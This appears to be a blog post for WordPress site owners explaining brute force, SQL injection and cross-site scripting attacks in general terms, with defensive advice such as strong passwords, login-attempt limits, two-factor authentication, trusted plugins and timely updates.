When it comes to our websites, we know security is a big deal. However, there are many ways a hacker can get into our site so it is difficult to predict how our sites may get hacked. That said, most attacks are very similar which allows us to examine the most common approaches.
By knowing what the hackers will most likely try, we can secure our site to prevent those attacks. This article will help you understand the methods by looking at the most common types of hacks.
Brute Force Attack
A brute force attack is one of the most common attacks on any site. In this attack, the hacker is guessing your password over and over until he figures out your password.
While most people immediately think of some hacker who is typing away on their keyboard, the hacker is actually no longer doing this manually. The hacker has several scripts running at the same time that is trying to figure out passwords to many sites at the same time.
One form of the brute force attack is called a dictionary attack. This is where the hacker uses every word in a dictionary as the password. Since several of the most common passwords are single words, the dictionary attack is a quick attack to gain access to your site.
How do you protect yourself?
So, how do you protect your site from a brute force attack? The first step is to ensure your passwords are secure. Check your password to make sure it is not on the list of the most common passwords. Then, verify that none of your passwords are words. Lastly, make sure all your passwords are long. Preferably at least 12 characters.
Next, you want to make sure the hacker can’t even find a username to try. Make sure there is no user with a default username such as admin, administrator, or developer.
Most security plugins have many features in place to prevent a brute force attack. A standard method is to limit the number of tries a user has to log in. If your password is not secure, the hacker’s script can usually figure out your password in 15,000 attempts which takes less than a few seconds. So, if you limit the number of guesses to 3 or 5, that stops the script from even being able to make its guesses.
Lastly, use two-factor authentication. Two-factor authentication, sometimes called “2Fa”, “TFA”, and “Two-step”, is the process of allowing a user to log in or authenticate using a second form of authentication. This additional form of authentication is usually something you have such as a phone or hardware key.
With two-factor enabled, if a hacker were to get your username and password, it would not be enough for the hacker to get in. The hacker would need to have your second form of authentication as well.
Some security plugins have two-factor authentication as a feature. Alternatively, you can use the Two Factor Authentication plugin.
Let’s assume that you have a non-secure search form on your site. A site visitor can type in what they want to look for. Then the site will retrieve the data from the database and display the data to the user.
Now, if a hacker were using the form, he or she would type in certain words and symbols that would change what data the site is retrieving. Instead of showing a list of posts, the hacker would make the form show him a list of posts and list of all usernames and passwords. This is SQL injection.
SQL Injection is when a hacker enters malicious words and characters into a form that is not secure to exploit the database in some way. Depending on the site, a hacker could use SQL injection to retrieve usernames and passwords, retrieve credit card numbers, alter data, or even delete data.
How do you protect yourself?
If you’re the developer, you will follow WordPress sanitizing, escaping, and validation functions and techniques.
However, most people are not developers. So, we need to find quality plugins that we know are secure and do not install plugins from untrusted sources or developers. Almost always, you should look for plugins in the WordPress Plugin Directory first. When installing a plugin, check the plugin’s reviews and support forums for any indication that it may not be secure.
Another essential method to protecting yourself is to always keep your site, plugins, and themes up to date. There are many times when a SQL Injection vulnerability is found in a plugin, and an update is released to fix the issue. If you continue to use the old version of the plugin, your site could be hacked through that vulnerability.
Cross Site Scripting
Cross Site Scripting, or XSS for short, is when a hacker adds his malicious script to your site. For example, if the hacker finds a way to embed his tracking script into your theme, he will be able to track all of your website’s visitors.
This is a simple example of Cross Site Scripting. Another example that I have seen recently is when a website had a form where visitors could enter testimonials. The entered testimonials are then displayed across the entire website.
On that site, the hacker entered in some malicious code into the form which then added his script to every page on the site. Now, every time a visitor came to the website, they were redirected to a different website claiming that their computer was now infected and they needed to pay $99 to fix it.
Another example is when an XSS vulnerability was found in WooCommerce in 2018. The vulnerability would allow a hacker to add dangerous which could enable the hacker to take over the site visitor’s browser or steal sensitive information. Naturally, this vulnerability was immediately fixed by WooCommerce as soon as it was discovered.
How do you protect yourself?
Protecting your site from Cross Site Scripting hacks is crucial to ensure no visitor can embed their scripts into your site. Again, always install plugins from trusted sources such as wordpress.org and from trusted developers.
Like with SQL Injection, another important preventative method is to keep your site updated. There are many times when an XSS vulnerability is found in a plugin, and an update is released to fix the issue. If you continue to use the old version of the plugin, your site could be hacked through that vulnerability.
Be sure to always discuss these concepts with any plugin developer, theme developer, or any other developer that you have working on your site. Additionally, ensure your password is secure and that you are limiting login attempts.
Has your site ever been hacked? Do you know how the hackers attacked your site? Be sure to comment below about the hacks that you have encountered so that we can all learn from them.